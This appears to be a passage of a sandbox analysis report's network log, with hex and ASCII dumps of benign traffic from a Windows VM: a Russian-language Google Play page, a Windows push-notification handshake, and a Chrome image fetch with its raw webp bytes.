                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d
                                                                                                                                                                                                                                  Data Ascii: 8000<!doctype html><html lang="ru" dir="ltr"><head><base href="https://play.google.com/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><meta name="viewport" content="width=device-width, initial-scale=1"><meta nam
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 32 30 2c 31 30 2c 31 34 2c 37 39 2c 34 33 2c 34 32 2c 31 33 39 2c 36 33 2c 31 36 39 2c 31 35 35 5d 5d 5d 2c 5b 5b 37 2c 31 32 32 5d 2c 5b 5b 31 2c 37 33 2c 39 36 2c 31 30 33 2c 39 37 2c 35 38 2c 35 30 2c 39 32 2c 35 32 2c 31 31 32 2c 36 39 2c 31 39 2c 33 31 2c 31 30 31 2c 31 32 33 2c 37 34 2c 34 39 2c 38 30 2c 32 30 2c 31 30 2c 31 34 2c 37 39 2c 34 33 2c 34 32 2c 31 33 39 2c 36 33 2c 31 36 39 2c 31 35 35 5d 5d 5d 2c 5b 5b 37 2c 37 32 5d 2c 5b 5b 31 2c 37 33 2c 39 36 2c 31 30 33 2c 39 37 2c 35 38 2c 35 30 2c 39 32 2c 35 32 2c 31 31 32 2c 36 39 2c 31 39 2c 33 31 2c 31 30 31 2c 31 32 33 2c 37 34 2c 34 39 2c 38 30 2c 32 30 2c 31 30 2c 31 34 2c 37 39 2c 34 33 2c 34 32 2c 31 33 39 2c 36 33 2c 31 36 39 2c 31 35 35 5d 5d 5d 2c 5b 5b 37 2c 37 31 5d 2c 5b 5b 31 2c
                                                                                                                                                                                                                                  Data Ascii: 20,10,14,79,43,42,139,63,169,155]]],[[7,122],[[1,73,96,103,97,58,50,92,52,112,69,19,31,101,123,74,49,80,20,10,14,79,43,42,139,63,169,155]]],[[7,72],[[1,73,96,103,97,58,50,92,52,112,69,19,31,101,123,74,49,80,20,10,14,79,43,42,139,63,169,155]]],[[7,71],[[1,
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 31 30 5d 5d 5d 2c 5b 5b 31 37 2c 35 35 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 35 2c 31 33 2c 33 31 2c 35 2c 34 31 2c 32 37 2c 38 2c 31 34 2c 31 30 5d 5d 5d 2c 5b 5b 31 37 2c 39 36 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 35 2c 31 33 2c 33 31 2c 35 2c 34 31 2c 32 37 2c 38 2c 31 34 2c 31 30 5d 5d 5d 2c 5b 5b 31 37 2c 31 30 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 35 2c 31 33 2c 33 31 2c 35 2c 34 31 2c 32 37 2c 38 2c 31 34 2c 31 30 5d 5d 5d 2c 5b 5b 31 37 2c 31 32 32 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 35 2c 31 33 2c 33 31 2c 35 2c 34 31 2c 32 37 2c 38 2c 31 34 2c 31 30 5d 5d 5d 2c 5b 5b 31 37 2c 37 32 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 35 2c 31 33 2c 33 31 2c 35 2c 34 31 2c 32 37 2c 38 2c 31 34 2c 31 30 5d 5d 5d 2c 5b 5b 31 37 2c 37 31 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 35 2c 31 33 2c
                                                                                                                                                                                                                                  Data Ascii: 10]]],[[17,55],[[1,7,9,25,13,31,5,41,27,8,14,10]]],[[17,96],[[1,7,9,25,13,31,5,41,27,8,14,10]]],[[17,10],[[1,7,9,25,13,31,5,41,27,8,14,10]]],[[17,122],[[1,7,9,25,13,31,5,41,27,8,14,10]]],[[17,72],[[1,7,9,25,13,31,5,41,27,8,14,10]]],[[17,71],[[1,7,9,25,13,
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34 2c 36 35 5d 2c 5b 5b 33 2c 34 2c 39 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34 2c 31 31 30 5d 2c 5b 5b 33 2c 34 2c 39 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34 2c 31 31 5d 2c 5b 5b 33 2c 34 2c 39 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34 2c 35 36 5d 2c 5b 5b 33 2c 34 2c 39 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34 2c 35 35 5d 2c 5b 5b 33 2c 34 2c 39 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34 2c 39 36 5d 2c 5b 5b 33 2c 34 2c 39 2c 36 2c 37 2c 32 2c 38 2c 31 2c 31 30 2c 31 31 2c 35 5d 5d 5d 2c 5b 5b 34 34
                                                                                                                                                                                                                                  Data Ascii: ,6,7,2,8,1,10,11,5]]],[[44,65],[[3,4,9,6,7,2,8,1,10,11,5]]],[[44,110],[[3,4,9,6,7,2,8,1,10,11,5]]],[[44,11],[[3,4,9,6,7,2,8,1,10,11,5]]],[[44,56],[[3,4,9,6,7,2,8,1,10,11,5]]],[[44,55],[[3,4,9,6,7,2,8,1,10,11,5]]],[[44,96],[[3,4,9,6,7,2,8,1,10,11,5]]],[[44
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 2c 31 31 2c 31 39 2c 32 31 2c 31 37 2c 31 35 2c 31 32 2c 31 36 2c 32 30 5d 5d 5d 2c 5b 5b 34 2c 31 31 33 5d 2c 5b 5b 31 2c 33 2c 35 2c 34 2c 37 2c 36 2c 31 31 2c 31 39 2c 32 31 2c 31 37 2c 31 35 2c 31 32 2c 31 36 2c 32 30 5d 5d 5d 2c 5b 5b 34 2c 31 33 39 5d 2c 5b 5b 31 2c 33 2c 35 2c 34 2c 37 2c 36 2c 31 31 2c 31 39 2c 32 31 2c 31 37 2c 31 35 2c 31 32 2c 31 36 2c 32 30 5d 5d 5d 2c 5b 5b 34 2c 31 35 30 5d 2c 5b 5b 31 2c 33 2c 35 2c 34 2c 37 2c 36 2c 31 31 2c 31 39 2c 32 31 2c 31 37 2c 31 35 2c 31 32 2c 31 36 2c 32 30 5d 5d 5d 2c 5b 5b 34 2c 31 36 39 5d 2c 5b 5b 31 2c 33 2c 35 2c 34 2c 37 2c 36 2c 31 31 2c 31 39 2c 32 31 2c 31 37 2c 31 35 2c 31 32 2c 31 36 2c 32 30 5d 5d 5d 2c 5b 5b 34 2c 31 36 35 5d 2c 5b 5b 31 2c 33 2c 35 2c 34 2c 37 2c 36 2c 31 31 2c 31
                                                                                                                                                                                                                                  Data Ascii: ,11,19,21,17,15,12,16,20]]],[[4,113],[[1,3,5,4,7,6,11,19,21,17,15,12,16,20]]],[[4,139],[[1,3,5,4,7,6,11,19,21,17,15,12,16,20]]],[[4,150],[[1,3,5,4,7,6,11,19,21,17,15,12,16,20]]],[[4,169],[[1,3,5,4,7,6,11,19,21,17,15,12,16,20]]],[[4,165],[[1,3,5,4,7,6,11,1
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 6c 2c 5c 22 46 4a 4b 63 50 65 5c 22 5d 2c 5b 34 35 36 34 35 34 35 32 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 6a 37 4c 64 49 63 5c 22 5d 2c 5b 34 35 35 38 35 35 31 31 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 6e 4b 71 41 4e 63 5c 22 5d 2c 5b 34 35 35 38 35 35 33 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 6f 62 6f 43 76 71 35 76 48 30 72 67 65 7a 57 62 72 52 6d 30 50 4d 42 78 36 5a 6f 56 5c 22 2c 6e 75 6c 6c 2c 5c 22 49 4c 37 4a 6c 5c 22 5d 2c 5b 34 35 35 38 35 35 32 35 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 41 52 4d 78 71 65 5c 22 5d 2c 5b 34 35 36 32 31 34 38 31 2c 6e 75 6c 6c 2c 74 72 75 65 2c 6e 75 6c
                                                                                                                                                                                                                                  Data Ascii: l,\"FJKcPe\"],[45645452,null,false,null,null,null,\"j7LdIc\"],[45585511,null,false,null,null,null,\"nKqANc\"],[45585532,null,null,null,\"oboCvq5vH0rgezWbrRm0PMBx6ZoV\",null,\"IL7Jl\"],[45585525,null,false,null,null,null,\"ARMxqe\"],[45621481,null,true,nul
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 6c 2c 5c 22 70 73 58 71 43 66 5c 22 5d 2c 5b 34 35 35 33 32 34 34 39 2c 6e 75 6c 6c 2c 74 72 75 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 51 59 62 35 73 64 5c 22 5d 2c 5b 34 35 36 32 30 32 34 39 2c 6e 75 6c 6c 2c 74 72 75 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 41 38 57 58 62 66 5c 22 5d 2c 5b 34 35 35 38 35 35 34 30 2c 6e 75 6c 6c 2c 74 72 75 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 58 67 34 34 73 66 5c 22 5d 2c 5b 34 35 36 34 36 34 32 34 2c 6e 75 6c 6c 2c 74 72 75 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 66 55 33 77 47 5c 22 5d 2c 5b 34 35 34 35 30 37 32 33 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 58 51 6b 45 37 65 5c 22 5d 2c 5b 34 35 36 33 34
                                                                                                                                                                                                                                  Data Ascii: l,\"psXqCf\"],[45532449,null,true,null,null,null,\"QYb5sd\"],[45620249,null,true,null,null,null,\"A8WXbf\"],[45585540,null,true,null,null,null,\"Xg44sf\"],[45646424,null,true,null,null,null,\"fU3wG\"],[45450723,null,false,null,null,null,\"XQkE7e\"],[45634
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INData Raw: 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 7a 70 39 70 7a 62 5c 22 5d 2c 5b 34 35 36 31 37 34 38 32 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 4f 53 5a 4b 5a 64 5c 22 5d 2c 5b 34 35 35 38 35 35 37 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 65 72 65 76 69 65 77 5c 22 2c 6e 75 6c 6c 2c 5c 22 54 6c 46 63 49 65 5c 22 5d 2c 5b 34 35 36 33 32 36 36 31 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 77 47 58 79 6d 66 5c 22 5d 2c 5b 34 35 35 38 35 35 34 37 2c 6e 75 6c 6c 2c 74 72 75 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 68
                                                                                                                                                                                                                                  Data Ascii: ull,false,null,null,null,\"zp9pzb\"],[45617482,null,false,null,null,null,\"OSZKZd\"],[45585571,null,null,null,\"https://play.google.com/store/ereview\",null,\"TlFcIe\"],[45632661,null,false,null,null,null,\"wGXymf\"],[45585547,null,true,null,null,null,\"h
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC384INData Raw: 30 2c 39 32 2c 35 32 2c 31 31 32 2c 36 39 2c 31 39 2c 33 31 2c 31 30 31 2c 31 32 33 2c 37 34 2c 34 39 2c 38 30 2c 32 30 2c 31 30 2c 31 34 2c 37 39 2c 34 33 2c 34 32 2c 31 33 39 2c 36 33 2c 31 36 39 2c 31 35 35 5d 5d 5d 2c 5b 5b 39 2c 36 38 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 31 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 33 31 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 31 30 34 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 39
                                                                                                                                                                                                                                  Data Ascii: 0,92,52,112,69,19,31,101,123,74,49,80,20,10,14,79,43,42,139,63,169,155]]],[[9,68],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,1],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,31],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,104],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,9
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC814INData Raw: 33 32 37 0d 0a 39 2c 31 32 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 36 35 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 31 31 30 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 31 31 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 35 36 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32 37 2c 38 2c 31 33 2c 31 30 5d 5d 5d 2c 5b 5b 39 2c 35 35 5d 2c 5b 5b 31 2c 37 2c 39 2c 32 34 2c 31 32 2c 33 31 2c 35 2c 31 35 2c 32
                                                                                                                                                                                                                                  Data Ascii: 3279,12],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,65],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,110],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,11],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,56],[[1,7,9,24,12,31,5,15,27,8,13,10]]],[[9,55],[[1,7,9,24,12,31,5,15,2


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                  99192.168.2.64993140.113.110.67443
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:42 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 6f 34 74 76 50 44 32 54 43 6b 69 52 32 75 50 57 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 62 34 36 32 34 62 38 30 36 61 37 64 62 32 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 304MS-CV: o4tvPD2TCkiR2uPW.1Context: 1b4624b806a7db2
                                                                                                                                                                                                                                  2024-09-29 04:53:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                  2024-09-29 04:53:42 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 6f 34 74 76 50 44 32 54 43 6b 69 52 32 75 50 57 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 62 34 36 32 34 62 38 30 36 61 37 64 62 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 58 45 6e 39 66 4d 54 56 31 48 4f 6b 36 78 5a 54 34 63 69 4f 74 44 64 41 52 42 4d 77 35 50 31 67 42 55 46 44 32 42 72 39 67 64 6b 6b 33 4f 44 32 67 4f 59 6b 6c 36 6d 70 4d 58 6e 57 54 70 45 39 73 4d 73 4d 74 57 39 53 54 67 76 76 2b 42 39 55 4c 55 66 45 37 76 34 41 67 31 39 6d 78 6a 2b 70 4d 43 70 69 67 69 4e 45 63 67 4a 57 6f
                                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: o4tvPD2TCkiR2uPW.2Context: 1b4624b806a7db2<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaXEn9fMTV1HOk6xZT4ciOtDdARBMw5P1gBUFD2Br9gdkk3OD2gOYkl6mpMXnWTpE9sMsMtW9STgvv+B9ULUfE7v4Ag19mxj+pMCpigiNEcgJWo
                                                                                                                                                                                                                                  2024-09-29 04:53:42 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 6f 34 74 76 50 44 32 54 43 6b 69 52 32 75 50 57 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 62 34 36 32 34 62 38 30 36 61 37 64 62 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 196MS-CV: o4tvPD2TCkiR2uPW.3Context: 1b4624b806a7db2<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 2b 4a 41 44 49 42 6b 67 45 65 41 50 76 69 74 6a 61 52 75 4c 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                  Data Ascii: MS-CV: c+JADIBkgEeAPvitjaRuLQ.0Payload parsing failed.


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  100192.168.2.649942216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:44 UTC1094OUTGET /CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 46200
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:45 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC859INData Raw: 52 49 46 46 70 b4 00 00 57 45 42 50 56 50 38 20 64 b4 00 00 90 82 02 9d 01 2a d0 02 60 01 3e 55 24 8f 45 23 a2 21 25 29 34 0b e8 a0 0a 89 63 6d e7 ec 0c ce 50 7b 63 ac 94 89 65 f1 71 3e 76 fc 2d 2b f9 18 57 dd 77 81 f7 87 ee 25 c9 7e 3f fd 8f c8 1c d6 1b f7 98 8f 4b 7f bb fb 79 f9 87 e9 ef cc 5f f5 f3 f6 3f fb ef a1 cf c2 1f de 2f 56 5f ad 1f f2 ff c0 7b b3 7f d5 ff 87 fe 53 e0 1f f5 9f f7 ff ee 3d c0 ff 8c ff 3c fb ef ef 8d fd b1 f6 06 fe 67 fd 9f ef ff e3 7b ff 17 fb 7f 86 af da 8f da 1f 80 ff e6 df d9 bf ec 7e 7f ff e0 fa 00 f4 00 ea 17 83 9f 9f f5 ab fa 1f dc bf d0 fc e2 f8 8b fe 67 0f fe f5 fe a7 ed 97 a9 1f 78 1f a9 eb d3 fc ae fd 7f 63 fe db d0 3b f3 af ee 1f f0 37 e6 7a 1f 32 0f 07 7f d4 ff 35 f9 37 f2 8f 37 4f ac bf 87 ff 9f dc 17 f3 17 d8 af 02
                                                                                                                                                                                                                                  Data Ascii: RIFFpWEBPVP8 d*`>U$E#!%)4cmP{ceq>v-+Ww%~?Ky_?/V_{S=<g{~gxc;7z2577O
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: c8 d9 49 5f 99 8d cf 64 33 cd 6b 91 09 57 54 c1 83 15 d9 30 ba a2 bd dd ed a1 15 06 2b 5d 3a 25 c5 96 c8 41 56 5a e7 8c 95 66 c3 55 0a 5b 83 b7 b1 5c 7c 5c 60 df d0 fb 9f 2d 2e 0e 98 25 d5 db b1 3c 00 4f dc bd dd cf 84 55 7f b2 7b 7d 32 04 61 94 d2 c6 1e f7 09 b8 fc 58 67 d5 e2 e3 03 8f 55 75 c8 88 d0 f8 08 b5 a0 e7 12 27 a4 74 c7 e7 d7 a9 5e 78 67 a6 78 2e 42 5d a1 b7 e5 7e c6 11 83 de 92 01 de d9 ba f0 ad eb 0c 3a d5 0e c8 bb c8 b6 c5 e0 3c ad 5d 00 04 47 57 93 6b 26 15 d6 07 b3 af b1 6f 32 0d 82 b0 40 7f 55 ae ea aa 92 b4 dd 03 a7 83 e9 fe 7c 15 c5 02 5e 4a f0 7e f1 2e c9 67 d7 77 55 89 48 f7 1c cd 46 fe ca 73 dd fd 2f f6 f8 b8 61 06 fc 57 9d 98 6c c6 9d fe 07 9a 33 f4 3a ff dd 68 70 d8 9e 58 8f aa d7 ae f8 40 1d 67 7d 3c 5a d4 c9 43 8b 18 86 9d 16 8f
                                                                                                                                                                                                                                  Data Ascii: I_d3kWT0+]:%AVZfU[\|\`-.%<OU{}2aXgUu't^xgx.B]~:<]GWk&o2@U|^J~.gwUHFs/aWl3:hpX@g}<ZC
